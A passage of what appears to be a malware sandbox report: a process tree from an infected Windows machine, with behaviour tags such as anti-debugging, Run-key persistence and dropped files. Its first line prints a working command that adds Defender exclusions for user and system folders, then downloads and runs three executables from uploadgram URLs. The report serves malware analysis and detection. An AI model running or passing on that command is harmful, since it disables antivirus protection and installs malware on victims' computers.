                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                              7⤵
                                                                                                                                                PID:5656
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                  8⤵
                                                                                                                                                    PID:1500
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:6108
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                    8⤵
                                                                                                                                                      PID:8940
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                      8⤵
                                                                                                                                                        PID:9756
                                                                                                                                                  • C:\Users\Admin\Documents\dR1EpbivAhXarSqe53HR5zB7.exe
                                                                                                                                                    "C:\Users\Admin\Documents\dR1EpbivAhXarSqe53HR5zB7.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:6376
                                                                                                                                                      • C:\Users\Admin\Documents\dR1EpbivAhXarSqe53HR5zB7.exe
                                                                                                                                                        "C:\Users\Admin\Documents\dR1EpbivAhXarSqe53HR5zB7.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5920
                                                                                                                                                      • C:\Users\Admin\Documents\BTEfpFdWD3YwzDU7Z5qKlcgY.exe
                                                                                                                                                        "C:\Users\Admin\Documents\BTEfpFdWD3YwzDU7Z5qKlcgY.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4996
                                                                                                                                                        • C:\Users\Admin\Documents\Nab_8mzJZz0oirncPA3tqI8s.exe
                                                                                                                                                          "C:\Users\Admin\Documents\Nab_8mzJZz0oirncPA3tqI8s.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6704
                                                                                                                                                          • C:\Users\Admin\Documents\Zc3S0OXtOGELCUXazgDeCzAC.exe
                                                                                                                                                            "C:\Users\Admin\Documents\Zc3S0OXtOGELCUXazgDeCzAC.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:6768
                                                                                                                                                          • C:\Users\Admin\Documents\nlEuyD6BHBNEymQArDVKdvhA.exe
                                                                                                                                                            "C:\Users\Admin\Documents\nlEuyD6BHBNEymQArDVKdvhA.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6816
                                                                                                                                                            • C:\Users\Admin\Documents\ZemqrBeIAAuQSZrd_G_XKjqP.exe
                                                                                                                                                              "C:\Users\Admin\Documents\ZemqrBeIAAuQSZrd_G_XKjqP.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6872
                                                                                                                                                              • C:\Users\Admin\Documents\lM4B7rY5B2gQyzRvR8ylTUMo.exe
                                                                                                                                                                "C:\Users\Admin\Documents\lM4B7rY5B2gQyzRvR8ylTUMo.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:6044
                                                                                                                                                              • C:\Users\Admin\Documents\KKOVlZExVTvU51FH7evSuhTZ.exe
                                                                                                                                                                "C:\Users\Admin\Documents\KKOVlZExVTvU51FH7evSuhTZ.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6976
                                                                                                                                                                • C:\Users\Admin\Documents\Tqabjj2K8DgS_H_2f89z04Sy.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\Tqabjj2K8DgS_H_2f89z04Sy.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:6804
                                                                                                                                                                • C:\Users\Admin\Documents\5xBKKViOpZEFm_kt0O6MfeHA.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\5xBKKViOpZEFm_kt0O6MfeHA.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:6176
                                                                                                                                                                  • C:\Users\Admin\Documents\5xBKKViOpZEFm_kt0O6MfeHA.exe
                                                                                                                                                                    C:\Users\Admin\Documents\5xBKKViOpZEFm_kt0O6MfeHA.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7680
                                                                                                                                                                  • C:\Users\Admin\Documents\1CuwV6MU1ehuI0B42LtYw6XT.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\1CuwV6MU1ehuI0B42LtYw6XT.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    PID:4468
                                                                                                                                                                  • C:\Users\Admin\Documents\LUZFIA2gmBWyf3abIn_PSkF7.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\LUZFIA2gmBWyf3abIn_PSkF7.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5332
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4162471.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4162471.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5004
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5593749.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5593749.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                          PID:640
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6012459.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6012459.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:5912
                                                                                                                                                                        • C:\Users\Admin\Documents\bI0QegYlG6ia3qU9CUJTNpCW.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\bI0QegYlG6ia3qU9CUJTNpCW.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:6372
                                                                                                                                                                        • C:\Users\Admin\Documents\EZyKKWO9RxUqXvUgTHRsWyDE.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\EZyKKWO9RxUqXvUgTHRsWyDE.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:6276
                                                                                                                                                                          • C:\Users\Admin\Documents\EZyKKWO9RxUqXvUgTHRsWyDE.exe
                                                                                                                                                                            C:\Users\Admin\Documents\EZyKKWO9RxUqXvUgTHRsWyDE.exe
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7820
                                                                                                                                                                          • C:\Users\Admin\Documents\m4bZS6pnPW_lj3gACFBqfTJy.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\m4bZS6pnPW_lj3gACFBqfTJy.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6440
                                                                                                                                                                              • C:\Users\Admin\Documents\m4bZS6pnPW_lj3gACFBqfTJy.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\m4bZS6pnPW_lj3gACFBqfTJy.exe" -q
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:4728
                                                                                                                                                                              • C:\Users\Admin\Documents\8sMOKZ5l7pEIfEG7rmkxy3e2.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\8sMOKZ5l7pEIfEG7rmkxy3e2.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:7392
                                                                                                                                                                              • C:\Users\Admin\Documents\e4i_tw6Do3XvMMgh9GVEXvil.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\e4i_tw6Do3XvMMgh9GVEXvil.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:7636
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-HGM11.tmp\e4i_tw6Do3XvMMgh9GVEXvil.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-HGM11.tmp\e4i_tw6Do3XvMMgh9GVEXvil.tmp" /SL5="$40236,138429,56832,C:\Users\Admin\Documents\e4i_tw6Do3XvMMgh9GVEXvil.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:7784
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RN94P.tmp\Setup.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RN94P.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:1520
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:6484
                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          PID:5312
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:5416
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          PID:6740
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding CE5297C5BC0C8FDA61A238502BB13869 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:5188
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding F20F0E574D604B524B7F717FB6369C80 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:5832
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 968E57A6CCC587C0D1FB2314EAEF59F3
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:8480
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 0E72B46B3C59B5B811933DB26B0455D5 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:8584
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            PID:8664
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:8672
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                PID:2332
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffd0854dec0,0x7ffd0854ded0,0x7ffd0854dee0
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5400
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6436e9e70,0x7ff6436e9e80,0x7ff6436e9e90
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6320
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --mojo-platform-channel-handle=1724 /prefetch:8
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:7616
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:9048
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --mojo-platform-channel-handle=2108 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          PID:4588
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:6476
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2544 /prefetch:1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:7956
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3148 /prefetch:2
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:5612
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --mojo-platform-channel-handle=1892 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3544
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --mojo-platform-channel-handle=3152 /prefetch:8
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:9276
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,3583301107698547895,7251950625586511142,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2332_97500880" --mojo-platform-channel-handle=3488 /prefetch:8
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:9608
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_6181.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                              PID:4076
                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          PID:7592
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:5532
                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          PID:6536
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:8872
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:9068
                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                            PID:7996
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:9100
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:8180
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            PID:8784
                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{42ceadeb-eceb-4f4a-b34e-6c67a0e0542f}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:7052
                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              PID:5200
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:7352
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            PID:7172
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:8608
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:9092
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ED.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ED.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:2340
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
